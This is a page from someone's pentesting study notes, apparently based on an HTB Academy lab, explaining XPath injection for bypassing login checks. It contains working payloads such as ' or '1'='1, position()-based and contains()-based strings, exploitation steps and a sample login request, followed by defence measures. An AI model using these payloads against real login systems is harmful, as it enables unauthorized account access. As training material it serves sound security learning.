📖
NOTES
  • Welcome!
  • Reference
    • Hacking
      • Penetration Testing Resources Bookmarks
        • Research Links
        • Cheat Sheet
        • Learning/Training
        • Tools
        • Payloads
        • Shell
        • AI
        • Reads
        • Podcast
        • Social Engineering
        • Payloads
      • Web/App Pentesting
        • SQL Injection
          • SQL Injection In The URL
          • SQL Injection In The Search Field
          • SQL Injection in Login forms
          • Boolean SQL Injection Blind
          • Time based SQL Injection Blind
          • Bypassing SQL Filters
          • SQL Injection with sqlmap
          • XPath Injection - Authentication Bypass
            • XPath Advanced Data Exfiltration
          • Payloads
        • XSS
          • Payloads
          • XSS Reflected
          • XSS Stored
          • Dom-based
          • Blind
        • Command Injection
          • Payloads
        • File Upload
          • Payloads
          • Bypass Filters
          • File Upload Tricks
        • SSRF
          • Payloads
        • LFI/RFI
          • Payloads
        • LDAP Injection
      • Port Swigger
        • Access control
          • Lab: Unprotected admin functionality
          • Unprotected admin functionality with unpredictable URL
          • User role controlled by request parameter
          • User ID controlled by request parameter, with unpredictable user IDs
          • User ID controlled by request parameter with password disclosure
        • Authentication
          • Username enumeration via different responses
        • Server-side request forgery (SSRF)
          • Basic SSRF against the local server
          • Basic SSRF against another back-end system
        • File Upload Vulnerabilities
          • Remote code execution via web shell upload
        • SQL Injection
          • SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
      • Burp
        • Setting up Macro for intruder
      • ☁️Cloud
        • Tools
        • AWS
          • 🪣S3 Buckets
          • Amazon IAM
          • Dockers
            • Tools
        • Azure
        • GCP
      • Networking
        • Cheat Sheet
      • Hardware Hacking
        • Computer BIOS
    • HTML/CSS/JAVA
      • Tools
      • HTTP Response Status Codes
      • Bootstrap Templates
      • SSL
      • cURL
      • Grep
    • DataBase
      • My SQL
        • Cheat Sheet
        • Tools
    • PYTHON3
      • Code Resources
      • Python Reference Guide
        • Cheat Sheet
      • Code Projects
        • Jiggler Mouse
        • loan calculator
        • Bilnd LDAP Data Exfiltration
    • SEO
      • Tools
      • On-Page SEO
      • Local SEO and Keyword Research
      • Content Optimization
      • Technical SEO
      • Off-Page SEO Tools
      • Google Ads
    • Cloud
      • AWS
        • Light Sail
          • Hosting Website on Light Sail and Namecheap
        • Boto3
      • Azure
      • GCP
    • Files
      • PDF
Powered by GitBook
On this page
  1. Reference
  2. Hacking
  3. Web/App Pentesting
  4. SQL Injection

XPath Injection - Authentication Bypass

Key Concepts

  1. What is XPath?

    • XPath is a query language for selecting nodes from an XML document.

    • It is often used in web applications for data retrieval and authentication mechanisms.

  2. What is XPath Injection?

    • An attack technique where an attacker manipulates user input to alter the structure of an XPath query, bypassing authentication or gaining unauthorized access.


XPath Query Example

Consider the following XML user data:

xmlCopyEdit<users>
  <user>
    <username>htb-stdnt</username>
    <password>Academy_student!</password>
  </user>
  <user>
    <username>admin</username>
    <password>admin</password>
  </user>
</users>

Authentication might use the following query:

xpathCopyEdit/users/user[username/text()='USERNAME' and password/text()='PASSWORD']

If user input is unsanitized, injection becomes possible.


Common Payloads

  1. Universal True (Bypass Authentication):

    ' or '1'='1

    Resulting Query:

    /users/user[username/text()='' or '1'='1' and password/text()='']
  2. Target a Specific User (Admin):

    admin' or '1'='1

    Resulting Query:

    /users/user[username/text()='admin' or '1'='1' and password/text()='irrelevant']
  3. Use Position-Based Targeting:

    ' or position()=2 or '

Change the 2 to an 3 to Pivot to different account

' or position()=3 or '
  1. Resulting Query:

    /users/user[username/text()='' or position()=2 or '' and password/text()='irrelevant']
    • This targets the second user in the XML file (e.g., admin).

  2. Substring Matching:

    ' or contains(.,'admin') or '

    Resulting Query:

    /users/user[username/text()='' or contains(.,'admin') or '' and password/text()='irrelevant']
    • Searches for any user with "admin" in their username or other fields.


Steps to Exploit

  1. Analyze Application Behavior:

    • Understand how usernames and passwords are processed (e.g., via POST requests, cookies, etc.).

  2. Test for Injection Points:

    • Inject payloads into the username or password fields to observe server responses.

  3. Craft Payloads:

    • Use payloads like position() or contains() to refine your query targeting.

  4. Privilege Escalation:

    • Use payloads to access specific accounts or enumerate users until the desired privileges are obtained.


Practical Exploitation Example

Payload to Target Admin (Second User):

username=' or position()=2 or '&password=irrelevant

Response Example:

  • Successfully logged in as WELCOME SUPERUSER!.


Defense Measures

  1. Sanitize Inputs:

    • Use proper input validation and encoding to prevent injection.

    • Reject special characters like ', ", [, and ].

  2. Parameterized Queries:

    • Avoid dynamically building XPath queries. Use parameterized XPath APIs:

      $query = "/users/user[username/text()=$username and password/text()=$password]";
  3. Hash Passwords:

    • Ensure passwords are hashed before storage and comparison.

  4. Error Messages:

    • Avoid detailed error messages that reveal query structures.


Key Takeaways

  • XPath Injection is similar to SQL Injection but targets XML queries.

  • Functions like position() and contains() can help refine targeting in complex scenarios.

  • Proper sanitization and secure coding practices are essential to mitigate these attacks.


Payloads to Remember

Scenario

Payload

Result

Bypass Authentication

' or '1'='1

Logs in as the first user.

Target Specific User (e.g., Admin)

admin' or '1'='1

Logs in as admin.

Position-Based User Targeting

' or position()=2 or '

Logs in as the second user.

Substring Matching (Admin)

' or contains(.,'admin') or '

Finds users with "admin" in username.

PreviousSQL Injection with sqlmapNextXPath Advanced Data Exfiltration

Last updated 3 months ago